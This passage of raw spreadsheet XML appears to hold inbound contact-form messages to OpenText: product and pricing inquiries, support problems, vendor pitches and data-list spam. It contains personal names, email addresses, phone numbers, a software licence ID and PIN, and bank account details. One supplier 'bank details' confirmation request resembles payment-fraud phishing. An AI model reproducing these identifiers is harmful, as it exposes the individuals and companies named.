Phone: (055-45) 9 9918-8714 _x000D_
Email: graely@gmail.com_x000D_
Gender: Female_x000D_
Nationality: Brazil_x000D_
Status: Single_x000D_
_x000D_
_x000D_
ASPIRATIONS IN LIFE_x000D_
_x000D_
_x000D_
I am graduated in Advertising and post graduated in Marketing. I chose this career because the psychology involved in it and the strategies that are used to develop a campaign to sell a product always impressed me. _x000D_
_x000D_
I am a hard worker, honest, prompt, friendly, sincere, reliable and with a  high level of personal and professional integrity. Totally fluent in Portuguese, proficiency at Advanced Business II level of English and conversational knowledge in Spanish._x000D_
_x000D_
_x000D_
MARKETING SPECIALIST BACKGROUND_x000D_
  _x000D_
1 – Pier 7 Coffee Shop (Toledo/PR/Brazil)_x000D_
Manager (2014 – Present Moment) _x000D_
Coffee is one of my passions, so I chose a coffee shop to get in this amazing world and know a little more about it. _x000D_
Responsible for direct customer service, event coordinating, team daily schedule, budget control, financial and administrative activities._x000D_
This job helped me to pay more attention to details, to be more flexible, to have a higher level of accuracy, to give clear information, to be multi-tasking, to be polite and more professional._x000D_
Essential duties: barista, customer assistance, vendor relations, cash handling, interpersonal/sales skills, monetary transactions, order supplies, organization, point of sale systems, pricing, sales, sales analysis, verbal communication, written communication._x000D_
_x000D_
_x000D_
2 – RPC TV – Afiliada Rede Globo (Foz do Iguacu/PR/Brazil) _x000D_
Schedule Analyst (2013 – 2014)   _x000D_
Supported the team schedule, researched and analyzed audience and population behaviors, supported decisions making about the brand positioning, Technical media. _x000D_
_x000D_
_x000D_
_x000D_
3 – Tamwood Language Centre (Vancouver/BC/Canada)_x000D_
Internship in Marketing (2011 – 2012)_x000D_
Created: surveys and organized focus groups</t>
  </si>
  <si>
    <t>question about how to execute plSQL block code before execute select for data set. plsql code is for prepare main data in temp table.</t>
  </si>
  <si>
    <t>Looking for a BI platform as a technical partner which will be used to deliver embedded analytics through our software as a service.</t>
  </si>
  <si>
    <t>Your SPF record is present _x000D_
_x000D_
Which very well shows that you don't want spoofed email to be sent from your domains, but you just forget one thing:_x000D_
_x000D_
DKIM (DomainKeys Identified Mail) is an important authentication mechanism to help protect both email receivers and email senders from forged and phishing email. Forged email is a serious threat to all parties in an email exchange._x000D_
_x000D_
DomainKeys Identified Mail (DKIM) is an email validation system designed to detect email spoofing by providing a mechanism to allow receiving mail exchangers to check that incoming mail from a domain is authorized by that domain's administrators and that the email (including attachments) has not been modified during transport. A digital signature included with the message can be validated by the recipient using the signer's public key published in the DNS. In technical term, DKIM is a technique to authorize the domain name which is associated with a message through cryptographic authentication._x000D_
_x000D_
DKIM was aimed at:_x000D_
_x000D_
Reducing false negatives_x000D_
Provide authentication reporting_x000D_
Apply sender policies at the receiving end_x000D_
Reduce phishing_x000D_
Be scalable_x000D_
_x000D_
Advantages:_x000D_
_x000D_
Use with spam filtering_x000D_
DKIM is a method of labeling a message, and it does not itself filter or identify spam. However, widespread use of DKIM can prevent spammers from forging the source address of their messages, a technique they commonly employ today. If spammers are forced to show a correct source domain, other filtering techniques can work more effectively. In particular, the source domain can feed into a reputation system to better identify spam. Conversely, DKIM can make it easier to identify mail that is known not to be spam and need not be filtered. If a receiving system has a whitelist of known good sending domains, either locally maintained or from third party certifiers, it can skip the filtering on signed mail from those domains, and perhaps filter the remaining mail more aggressively._x000D_
_x000D_
Anti-phishing_x000D_
DKIM c</t>
  </si>
  <si>
    <t>A requirement from a customer for having a AV solution to be implemented in Content Suite</t>
  </si>
  <si>
    <t>Access to account information. I just changed my email address from Michael.p.fitzgerald@tsocorp.com to Michael.p.fitzgerald@andeavor.com. I can no longer log into OT connect to view/open tickets, etc. Site keeps telling me I have need a confirmation email, which i have completed. Please remediate asap, as i opened a ticket this morning, before making the mistake of modifying my email.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam, _x000D_
_x000D_
This email is in regards to our Master’s final year project at Kingston University, London. Based on this project we are conducting an intensive market research which is focusing on Virtual Reality devices in the Gaming industry in the USA. It consists of 15 questions which shall take approximately 5 minutes to complete and your survey responses will remain strictly confidential._x000D_
We would highly appreciate your participation!_x000D_
_x000D_
Please follow the link for the survey:_x000D_
https://kingston.eu.qualtrics.com/jfe/form/SV_6swGXlqDrdVdnCZ _x000D_
_x000D_
_x000D_
If you wish to get any further information or have any questions and concerns, you may contact the researchers at the emails below:_x000D_
k1637877@kingston.ac.uk - Desislava Ivanova_x000D_
k1635537@kingston.ac.uk - Arpita Kachari_x000D_
K1645149@kingston.ac.uk - Rumaisa Nasir_x000D_
K1648572@kingston.ac.uk - Haseeb Shah_x000D_
_x000D_
_x000D_
Kind Regards,_x000D_
Desislava Ivanova_x000D_
</t>
  </si>
  <si>
    <t>Hello, we are interested in the partner program. I'd like to find out details and look to get set up as a partner. I also have an immediate opportunity with a customer. Please give me a call to discuss. Thanks!</t>
  </si>
  <si>
    <t>Would like to evaluate suitability of Documentum SSV for my company</t>
  </si>
  <si>
    <t>did not get mail for free or trail version</t>
  </si>
  <si>
    <t>Wishful Wicks  is the only blowout candle that trades the flame for colorful fun. If you’ve ever wanted a flame-free alternative to extinguish the hassle from celebrating on the go,  Wishful Wicks has your wish granted! An innovative spin on the classic candle, Wishful Wicks ensures parties will always be exciting and safe!_x000D_
 _x000D_
Simply place the candle unit into the holder, place Wishful Wicks on top of your cake, and enjoy the LED, multicolored effect! You won’t miss the drip, wick, or wax of traditional candles as Wishful Wicks are smokeless, odorless, and reusable! Once you’ve been dazzled by the array of ever-changing colors emanating from your cake, simply blow out Wishful Wicks like you would an ordinary candle for extraordinary, flame free party-time!_x000D_
_x000D_
_x000D_
Wishful Wicks creators, Chrissy and Marnette wanted to disrupt the standard candle and originate an allergy-free  and safe alternative to smoke and odor-causing candles. Wishful Wicks is the uniquely innovative and essential to addition celebrations and cake tops everywhere!_x000D_
_x000D_
Wishful Wicks are the perfect addition to your retail, and are packaged and distribution ready._x000D_
 _x000D_
Demonstrational video and product images available_x000D_
 _x000D_
Thank you for your time!_x000D_
Best,_x000D_
 Jay</t>
  </si>
  <si>
    <t>I attended Training during Enterprise World, but I did not receive the certificate yet. Can you please send it to me? _x000D_
Thanks _x000D_
Elvira</t>
  </si>
  <si>
    <t>I would like to get pricing for purchasing the Captiva Cloud Toolkit and deploying solutions. Thanks</t>
  </si>
  <si>
    <t>I'm trying to contact the Account Manager for UC San Diego</t>
  </si>
  <si>
    <t>To whom it may concern at  OpenText,_x000D_
_x000D_
My name is Lourdes Salazar and I am a recruiter at Elite Personnel Group specializing in recruiting for IT and other related fields based in Central New Jersey. We have recently noticed that you are in need of a Senior System Administrator at your Tinton Falls, NJ location. On behalf of the team and myself, we would like to extend our staffing services to your company to help you find the right candidate in very efficient time. If you are interested in this proposal please feel free to contact me at msalazar@eliteitpersonnel.com or you can reach my phone at (908) 722-1111 ext. 117. We would love to become partners and provide you with a long-term, excellent staffing experience._x000D_
_x000D_
Thank you for your time and I hope to speak with you soon!_x000D_
_x000D_
Best,_x000D_
Lourdes</t>
  </si>
  <si>
    <t>just to know about opportunities and how can a fresher like me be helpful to your company.</t>
  </si>
  <si>
    <t>We would like to purchase the domain name hummingbird.com. We are a Bitcoin &amp; Digital Currency Exchange located in Chicago with 70 outlets across 10 US states.</t>
  </si>
  <si>
    <t>I would like to get a trial version of report builder 6.2</t>
  </si>
  <si>
    <t>Pricing for right fax</t>
  </si>
  <si>
    <t>I was looking for a new manual for DM as we upgraded to ver 10 and we have old documentation. Where can I download? Thank you!</t>
  </si>
  <si>
    <t>Trying to get to team developer support forums. I have cliked on link in confirmation email twice. Keeps going to "OpenText Connect_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
Request Confirmation Email_x000D_
"</t>
  </si>
  <si>
    <t>Hi, we looking for a rebranding opportunity and would like to know if we can purchase the domain 'firstclass.com' from you. Our new business name is 'First Class' so this would fit perfectly with our brand. Please get back to me as soon as possible as we need to roll out our site soon.</t>
  </si>
  <si>
    <t>I am researching document management systems and I came across your company.  Can I get a demo?_x000D_
Best,_x000D_
Josephine</t>
  </si>
  <si>
    <t>interested in your Fax2email solution. best to contact me via email.  We have approximately 150 fax lines and an on premise fax server.  Looking to replace this with a cost effective cloud solution. What would pricing look like?_x000D_
_x000D_
Thanks,_x000D_
      Steve</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
My company is in the market for a clinical protocol review software/application and I am looking to get some preliminary info about your products (i.e. features, cost, operating systems it works with, etc.)Documentum for Life Sciences Solution Suite 4.2 and the R&amp;D application specifically.. If you could email that information I would greatly appreciate it._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Carl_x000D_
</t>
  </si>
  <si>
    <t>I am curious if any Canadian Federal departments use the opentext auto-classification tool?  Please contact via email.</t>
  </si>
  <si>
    <t>Good Morning, we have Invoice # 9000085653 we would like to pay however, we do not have Opentext set up in our system.  Could you kindly email me a copy of your W-9 so that we may mail payment out a.s.a.p.  Thank you Jennifer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir / Madam_x000D_
  _x000D_
HireRight has been appointed by one of their Clients to verify information for the purposes of a pre-employment screening report and has been asked to confirm the employment history of the former employee of yours._x000D_
_x000D_
My colleague Dorota Madej (dmadej@hireright.com) has sent you a reference request on 29/07/2017._x000D_
_x000D_
Could you please confirm that our verification request was received and advise when may we expect a response from you?_x000D_
_x000D_
Thank you in advance for your help and look forward to hearing from you shortly._x000D_
</t>
  </si>
  <si>
    <t>Our enterprise CMS environment is currently on Management Server 11.2 Build and we are looking to see if there is any new product or upgrade possiblitiy that we could implement next year. I'm interested in getting as much information as possible and scheduling a customized demo.</t>
  </si>
  <si>
    <t>Hello, I'm looking for a system that can provide a strong MAM with an integration with Adobe Premiere, and/or a strong cloud-based DAM. We'd be looking for a good bit of control and access to the back end of the systems as well._x000D_
Thanks,_x000D_
-Andrew</t>
  </si>
  <si>
    <t>My organization is interested in learning more about the system and would appreciate if you could advise us specifically on the following:_x000D_
1. Is the system network based or cloud based?_x000D_
2. Does the system conform with FDA GCP standards and is it 21 CFR Part 11 compliant? _x000D_
3. Is the software HIPAA compliant and does it provide user log-in security?_x000D_
4. Does the system have the capability of capturing subject data such as demographics, contact information, medical conditions, medications, allergies, emergency contact information? _x000D_
5. Is the system able to set appointments, that is, to automatically send appointment confirmations and reminders to subjects?_x000D_
6. Can the system set reminders for follow-up calls in a calendar?_x000D_
7. Is the system able to continually update project and site metrics (# screened, # enrolled, # screen failures, # completed, # dropped etc) per protocol/study? _x000D_
8. Does the system have the capability to handle documents with version tracking/documentation that requires tracked changes to be monitored (eg. protocol, informed consent form, IRB submissions and approvals, contract/budget negotiations, product receipts etc)_x000D_
9. Is the system able to upload all study related documents and provide easy access to these documents?_x000D_
10. Is the system capable of tracking subject visits for example providing notification for upcoming and overdue visits from initial screening visit to final visit)?_x000D_
11.Is there a project calendar available in the system?_x000D_
12. Recruitment capabilities - is there a search function available in the volunteer database to search for potential volunteers based on age, BMI, gender, medical conditions etc?_x000D_
13. Is the system capable of maintaining the budget for each project?_x000D_
14. Does the system have the capability to create invoices to sponsors and purchase orders for subject payments?_x000D_
15. Finance Management - is the system able to track revenue, costs and profitability?_x000D_
16.Can the system facilitate data-importing functions fo</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning!_x000D_
My name is Debbie, and I am the Production Coordinator at American Payroll Association. We used to do some business with easyfax. We are now looking for a new fax company. _x000D_
_x000D_
I fax approximately 63,000 pages a year in 4 campaigns. Each of the four is broken down into smaller campaigns. For example, _x000D_
_x000D_
The campaign I fax in April, is actually made up of approximately 11 different lists for each 2 page fax (by state) for an approximate total of 10,200 pages, but within that total some lists are as small as 350 completed pages, and the largest at 2000 completed pages._x000D_
_x000D_
The Campaign in June is approximately 10 different 2 page faxes for a total of approximately 12,000 pages, once again the smallest list only 350 pages the largest 2100 pages._x000D_
_x000D_
The campaign in August is approximately 12 different 2 page faxes for a total of approximately 10,400 pages, once again the smallest list only 152 pages the largest 2100 pages._x000D_
_x000D_
My largest of the year is in October with approximately 20 different 2 page faxes for a total of approximately 30,600 pages, once again the smallest list only 212 pages the largest 3700 pages._x000D_
_x000D_
Can you please email me information on you fax services and pricing. Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Our Finance department is currently using OpenText Enterprise Scan to scan invoices into SAP.  The software is licensed through Hasbro which this site was part of until August 2015.  I believe we have 3 users using this application at this time.  What are my options for purchasing this software?  </t>
  </si>
  <si>
    <t>Army customer requires a fax server solution as part of a Cisco UCM procurement, I need to understand the licensing model and create a BOM to get them rough pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
According to MiFID II requirements, I am looking for the system enabling the indexation of different communications means with the ID of the transaction. Could you please send me more detailed information about the system that you offer? Is it possible to add to the list of communication means also conversations and deal tickets from the trading systems i.e. Bloomberg or Thomson Reuters? _x000D_
Thank you in advance for your response._x000D_
Best regards,_x000D_
Anna Lewińska_x000D_
</t>
  </si>
  <si>
    <t>Dear sir or madam!_x000D_
_x000D_
I am unable to register to the developer forum. I give every data, I can login and so on, but I get no verification e-mail at all. Without verificating my account I'm unable to even view any topic. I can't even log out! Please fix this bug ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, Madam,_x000D_
_x000D_
Your company has been identified as a supplier at GSK Vaccines for which a change in the bank details has been requested._x000D_
_x000D_
To ensure payment on time, avoid any risk of fraud and accelerate the administrative processing of this request, please confirm your below bank details by responding to this email._x000D_
_x000D_
ACCOUNT HOLDER NAME: OPEN TEXT COOPERATIEF U.A._x000D_
IBAN: NL88CITI0266078974_x000D_
SWIFT: CITINL2X_x000D_
_x000D_
Please be advised that without your confirmation, no payment can be performed._x000D_
_x000D_
Thank you for your cooperation._x000D_
_x000D_
Treasury_x000D_
GSK Vaccines_x000D_
</t>
  </si>
  <si>
    <t>Can I change my email ID to pranjal.potnis@gmail.com and receive all the information there?</t>
  </si>
  <si>
    <t>Inquiry on product features and pricing of Content Management System (Document Management System).</t>
  </si>
  <si>
    <t>Demo for Digital Asset Management platform for our eCommerce strategy.</t>
  </si>
  <si>
    <t>Request for 2-4900 Cordys for Business Analysts and 3-4903 Cordys Administration training.</t>
  </si>
  <si>
    <t xml:space="preserve">We get daily emails from our end users asking us to update the fax numbers within Rightfax. This requires us to log into their computers and import a csv file that we maintain. This is becoming very cumbersome to do. We have been unable to find a way around this procedure. Can someone assist with this process? We are on 10.0.0.2032 server and 10.0.0.349 client. </t>
  </si>
  <si>
    <t>Trying to add EMC software to account and also verify Subscription expiration</t>
  </si>
  <si>
    <t>Would Like to schedule a demo of Open Text Live Link</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to acquire Analytics professional’s data across USA and Globe for your perpetual marketing initiatives?_x000D_
_x000D_
1.     Chief Analytics Officers_x000D_
2.     Data Scientist_x000D_
3.     Data Engineer_x000D_
4.     Big Data Engineer_x000D_
5.     Machine Learning Scientist_x000D_
6.     Business Analytics Specialist_x000D_
7.     Data Visualization Developer_x000D_
8.     Business Intelligence (BI) Engineer_x000D_
9.     BI Solutions Architect_x000D_
10.   BI Specialist_x000D_
11.   Analytics Manager_x000D_
12.   Machine Learning Engineer_x000D_
13.   Statistician          _x000D_
_x000D_
Contact Information Fields : First Name, Last Name, Organization Name, Organization URL, Title, Direct business email address, Physical Address, Phone Number, Fax Number, Industry, SIC codes, Revenue Size and Employee size_x000D_
_x000D_
Let me know if you are interested I will be glad to assist you with further information._x000D_
_x000D_
I will look forward for your response._x000D_
_x000D_
Best Regards_x000D_
Lisa White_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Business Process Management (BPM) Software Users?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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Jacqueline Kenedy</t>
  </si>
  <si>
    <t>i need to download rightfax product suite 10.6.3.2109</t>
  </si>
  <si>
    <t>We own ECM Content Suite (I believe), but does it include Extended ECM so that we can utilize it with Salesforce?</t>
  </si>
  <si>
    <t>Need to transfer a license from Xyratex UK to Seagate US. Xyratex was acquired by Seagate and we are now running Easylink in the US. We also have a couple of outstanding invoices from Xyratex and I need to ensure they are paid in correct currency. Please email so we can schedule a time to discuss. Thank you.</t>
  </si>
  <si>
    <t>Upgrading from iHub 3.1.1 to 16.2, need new license._x000D_
Current license info:_x000D_
&lt;LicenseInfo_x000D_
			 Mode="Enterprise"_x000D_
			 CPULimit="2"_x000D_
			 LicenseID="135954"_x000D_
			 UsageType="MultiUserTest License"_x000D_
			 IsOfficial="true"_x000D_
			 LicenseType="CPUBased"_x000D_
			 ServicePack="0"_x000D_
			 IsNodeLocked="false"_x000D_
			 MajorRelease="23"_x000D_
			 IsDevelopment="false"_x000D_
			 ExpirationDate="2017-07-01"&gt;_x000D_
			&lt;LicensedOptions&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="BIRTReport"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="BIRTInteractiveViewer"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="BIRTPageSecure"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="Dashboards"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="InteractiveCrosstabs"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="MultiApp"_x000D_
					 Users="Unlimited"/&gt;_x000D_
				&lt;LicensedOption_x000D_
					 Name="ReportStudio"_x000D_
					 Users="Unlimited"/&gt;_x000D_
			&lt;/LicensedOptions&gt;_x000D_
		&lt;/LicenseInfo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for documentation concerning change/revision history and product revision release dates.  Is that published on the site somewhere?  I need to submit these for a cyber review prior to upgrade.  Please provide this information directly or tell me where I can download obtain the information from the site.  </t>
  </si>
  <si>
    <t>fdgdf</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I modified my email address in my account and I lost my profile!_x000D_
My old email address was Beatrice.bauchais@alcatel-lucent.com_x000D_
Please, could you restore my profile ?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are a automotive industry company, and we need an EDI platform with our customers.</t>
  </si>
  <si>
    <t>Requesting access to OpenText documentation and release notes for SAP solutions.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
My name is Eliseu Kaleniuk and I work at Targetware Informatica, a Brazilian reseller company. We have an open opportunity in our system, could you please help me with the quote?_x000D_
_x000D_
Product: Brava Desktop _x000D_
Quantity: 08_x000D_
License: Commercial_x000D_
Platform: Windows_x000D_
_x000D_
Kind Regards,_x000D_
Eliseu Kaleniuk</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have many users of exceed + the ssl package which when I installed was a separate license.   We are upgrading to windows 10.  Since upgrading exceed not work (I have not upgraded yet but believe it is due to font issues).  Is there an upgrade available that we should install?_x000D_
Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
A client of DXC technology is currently using a version of you product. I was wondering if you could let me know which versions of Opentext exceed were in support and the EOL dates for these. _x000D_
_x000D_
Kind Regards, </t>
  </si>
  <si>
    <t>Exploring an alternative ECM and WCM product</t>
  </si>
  <si>
    <t>Prezados, estamos interessados em soluções MFT (Managed File Transfer) e gostaríamos de enviar um pedido de informações (RFI) por e-mail para avaliação._x000D_
Att,</t>
  </si>
  <si>
    <t>Looking for information on upgrade services for DM 10 to 16.2, including library data migration to greenfield platform if possible.</t>
  </si>
  <si>
    <t>Hallo, wir sind derzeit auf der Suche nach einem Dokumentenmanagement System. In diesem Zusammenhang sind wir auf OpenText gestoßen. Gerne würden wir uns Ihr System einmal von Ihnen vorstellen lassen, wobei unsere Anforderungen in einem solchen Termin berücksichtigt werden sollten. Einen High-Level Anforderungskatalog kann ich Ihnen gerne zukommen lassen. Ich bitte um Kantaktaufnahme ....</t>
  </si>
  <si>
    <t>Our customer Sika is continuously getting information from you to wrong addresses (latest info: change to SAP/requirements) and wanted to inform you about the correct ones. Please forward this info to the department dispatching OT letters/mails. _x000D_
_x000D_
Sika Group's correct address is:_x000D_
Tueffenwies 16_x000D_
8048 Zurich Switzerland_x000D_
Switzerland_x000D_
_x000D_
Please delete the following addresses:_x000D_
_x000D_
Sika Informationssysteme AG _x000D_
Tueffenwies 16_x000D_
8064 Zuerich Switzerland_x000D_
_x000D_
Sika Informationssysteme AG_x000D_
Rechnungswesen Allmend 2_x000D_
8967 Widen Switzerland_x000D_
_x000D_
Sika Informationssysteme AG_x000D_
Allmend 2_x000D_
8967 Widen Switzerland_x000D_
_x000D_
Sika Informationssysteme AG_x000D_
Bellikonerstrasse 218_x000D_
8967 Widen Switzerland_x000D_
_x000D_
Thank you and kind regards,_x000D_
Esther</t>
  </si>
  <si>
    <t>Hello OpenText,_x000D_
_x000D_
I would like to evaluate your "Content Suite Platform" and "Documentum" for further use in business and private use._x000D_
_x000D_
I already evaluated "Core" (Team &amp; Enterprise Edition) which was insufficient for both my personal and business use cases._x000D_
_x000D_
As I couldn't find clear documentation regarding "Content Suite Platform" and "Documentum" regarding price, use case, features and comparison, I hope you could help me out._x000D_
_x000D_
Is it possible to get a demo version and some kind of facts-based overview?_x000D_
_x000D_
Best Regards_x000D_
Chris Engel</t>
  </si>
  <si>
    <t>Hello, we are an M&amp;A Boutique law firm constantly handling a lot of complex Transaction documentation. Hence, we are seeking a smart, law focused DMS and would be grateful if one of your Team members could have a demo session with us. Many thanks!</t>
  </si>
  <si>
    <t>I' having problems locating the license - so I can't renew the software. Can you assist with this?</t>
  </si>
  <si>
    <t>We have begun an RFP for a global approval system of record for commercial content, but we have not had a response from OpenText. Can you identify the contact email address for our Medtronic single point of contact at OpenText?</t>
  </si>
  <si>
    <t xml:space="preserve">I am working for the Leicestershire County Council and I just had a quick query about your application SmartOffice v11.1 and if the application will work once we upgrade from Windows 7 to Windows 10. _x000D_
Will it also integrate with Microsoft Office 2016?_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Would like to know more about AP Automation for one of clients based in the UK._x000D_
_x000D_
Regards, _x000D_
_x000D_
Ajay</t>
  </si>
  <si>
    <t>Fragen zur OPENTEXT LEARNING ON_x000D_
DEMAND SUBSCRIPTION. Könnten sie mich bitte schnellstmöglich telefonisch Kontaktieren.</t>
  </si>
  <si>
    <t xml:space="preserve">First Page On Google Ranking_x000D_
_x000D_
Hello Business Owner,_x000D_
_x000D_
I found your contact through a Google search and found you're not ranking in Google's 1st page._x000D_
_x000D_
If you don’t mind, I want to send you an SEO proposal to compare/consider? There is absolutely no pressure at all. _x000D_
_x000D_
We provide high-quality and results-driven online marketing and advertising solutions for businesses wanting to drive more traffic to their website or sales from it._x000D_
_x000D_
In terms of pricing, our pricing structure is heavily dependent on the keywords you wish to target for your website and their current positions on Google._x000D_
_x000D_
In short, if you give us 10 minutes of your time, we will prove that as a leading Digital Marketing specialist, we have the capability of getting you to the first page of Google - which in turn will start driving traffic to your website._x000D_
_x000D_
Look forward to your timely response_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello and good morning_x000D_
_x000D_
I am Sam Wilson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Sam Wilson</t>
  </si>
  <si>
    <t>Hello, Can you please review my resume for Sr. TA Specialist profile with OpenText, Hyderabad and let me know if I am shortlisted?_x000D_
_x000D_
My candidature is perfectly matching to the criteria and I am ready to join immediately._x000D_
_x000D_
Thanks,_x000D_
Sandip</t>
  </si>
  <si>
    <t>Conferma are in the process of reviewing the OpenText RightFax 10.6 Feature Pack 3 Integration Module for a mutual customer of ours.  I am keen to hold commercial conversations on a wider scale around the fax services available.  Can somebody contact me to discuss further._x000D_
_x000D_
Regards_x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I created a account but I can't see the knowledge base and I can't see the download/patches pages, can you please give access to me._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Wilco Zoutendijk</t>
  </si>
  <si>
    <t>Project Access Issues</t>
  </si>
  <si>
    <t>We are looking for a new cms for our website, and we want to learn more about the opentext. Thanks.</t>
  </si>
  <si>
    <t>As am a fresher i want to know the detalis for walkins</t>
  </si>
  <si>
    <t xml:space="preserve">We have recently purchased a piece of equipment from Keysight. Loading the operating system, it's telling me I need Opentext Exceed 15 SP3 for N6820ES. How do I get this?_x000D_
</t>
  </si>
  <si>
    <t>I have an older SQLWindows application that talks to SQLBase Server V 7.6.1-PTF 3._x000D_
_x000D_
I am trying to create a Stored Procedure but keep getting errors when using SQLTalk to try to build it.   ANY assistance would be greatly appreciated The SP is as follows :-_x000D_
_x000D_
connect RetaliNo;_x000D_
_x000D_
Procedure: Test_x000D_
Parameters_x000D_
Local Variables_x000D_
	File Handle: hFile_x000D_
Actions_x000D_
	If SalFileOpen( hFile, "C:\\ReBoot.txt", 0x01000 | 0x10000 | 0x00001_x000D_
)_x000D_
		If SalFileWrite( hFile, "Text to write", SalStrToNumber( "Text to write" ) )_x000D_
			Call SalFileClose( hFile )_x000D_
;_x000D_
_x000D_
disconnect RetaliNo;</t>
  </si>
  <si>
    <t>I've recently assumed control of a Alchemy database from a colleague who recently retired, and I have a few questions regarding troubleshooting the system. Thank you.</t>
  </si>
  <si>
    <t>Would like to request demo or trial for Opentext Blazon Enterprises to replace our existing Net-IT Central software</t>
  </si>
  <si>
    <t>need an on premise inbound fax solution to integrate with exchange UM and skype for business enterprise voice</t>
  </si>
  <si>
    <t>Need to put in service ticket, telling me I do not have access to this option.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to put a roadmap for Documentum within Carestream we have currently 9 different doc management systems and we are looking to consolidate we need the Open text help to partner and build a strategy together. </t>
  </si>
  <si>
    <t>Good afternoon we are in the process of upgrading our department PC’s and neither of the links within the original email are working, please send new web addresses for download and licensing._x000D_
_x000D_
Thank you_x000D_
_x000D_
Thank you for purchasing Redact-It Desktop. Please archive this email for future reference. You must be connected to the internet during product installation to complete the licensing process._x000D_
_x000D_
If you have a trial version of the product already installed, please uninstall that program prior to installing your purchased version. _x000D_
_x000D_
The following information will be necessary to complete the installation process:_x000D_
_x000D_
SoftwareID: QDS0CA00F9IY_x000D_
PIN: 376345 _x000D_
_x000D_
To download your product:_x000D_
_x000D_
Download your product from one of the following locations:_x000D_
ftp://ftp2.infograph.com/DL/Redact-It/Desktop/RedactItDesktop.exe_x000D_
http://ftp2.infograph.com/DL/Redact-It/Desktop/RedactItDesktop.exe_x000D_
_x000D_
If you purchased a network license, you must also download and install the License Manager from: _x000D_
ftp://ftp2.infograph.com/DL/LicenseManager/LicenseManager.exe_x000D_
http://ftp2.infograph.com/DL/LicenseManager/LicenseManager.exe_x000D_
_x000D_
To manually obtain your license file please visit: _x000D_
http://licensing.infograph.com/LogIn.asp?localization=US_x000D_
_x000D_
1. Provide your SoftwareID and PIN _x000D_
_x000D_
2. Select the checkbox to the left of the product name, then click Generate License. _x000D_
_x000D_
3. Provide your MAC ID if Prompted_x000D_
_x000D_
4. Select the download checkbox (to the right of the product name) and click the Download License button to obtain the IGCKey.lic file. You will be prompted for the location of this file during the install._x000D_
_x000D_
If you have any difficulty with the download or installation of this product, please contact our Technical Support department at support@infograph.com._x000D_
_x000D_
Thank you,_x000D_
Informative Graphics Corporation_x000D_
_x000D_
Destination Control Statement._x000D_
Export Control Classification Number: ECCN 5D002, License Exception: ENC. _x000D_
These commodities, technology or software were exported from the United Sta</t>
  </si>
  <si>
    <t xml:space="preserve">Explore Synergies for Corporate Sponsorship of Second Harvest Food Bank or School Pantrys for children. Your sponsorship would come at a critical time as too many local families aren’t getting enough healthy food to eat. Despite the booming economy, more families depend on Second Harvest for food than they did at the height of the recession.  It’s the Silicon Valley hunger paradox.  As the economy grows, so does cost of living and the number of people who need food.  People who make our community work, like teachers, health care workers, cashiers and clerks, can’t afford to pay rent and feed their families the nutritious food they need to live vibrant, healthy lives.We are feeding an average of 253,000 people each month and 89,000 of those are children. OpenText employees volunteer for sorting and packing events at our San Carlos location. </t>
  </si>
  <si>
    <t xml:space="preserve">I have created a Birt report whose output will be in Excel format. In Excel to make it accessible, in the top left cell which is the intersection of column and row titles, I mark an accessible region in a the worksheet like this: "TitleRegion1.A4.T34.1" .  This is so JAWS will recognize column and row headers, and will announce them when cells gain focus. _x000D_
Is it possible to create a report in  Birt which will mimic this functionality when output as Excel.?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Jacob Reerds_x000D_
Maisoord 10_x000D_
3991 VD Houten_x000D_
Tel.: +31 (0)30-637 29 16_x000D_
The Netherlands_x000D_
_x000D_
Dear Sir / Madame,_x000D_
My hobby is to collect markclips and paperpins. That are kind of paperclips or paperbinders with a firm logo on top, as you can see underneath. My question is, if you receive such clips or if you use them within your company._x000D_
_x000D_
With this message I try to supply my collection (41000 pieces) with new material. I hope that you can help me and send some of those mark clips or paper pins._x000D_
_x000D_
Thank you very much for your cooperation,_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jacob Reerds_x000D_
</t>
  </si>
  <si>
    <t>quote</t>
  </si>
  <si>
    <t>Looking for notification solutions for Maerskline IT which will enable our customers to receive event notification via email, sms etc</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
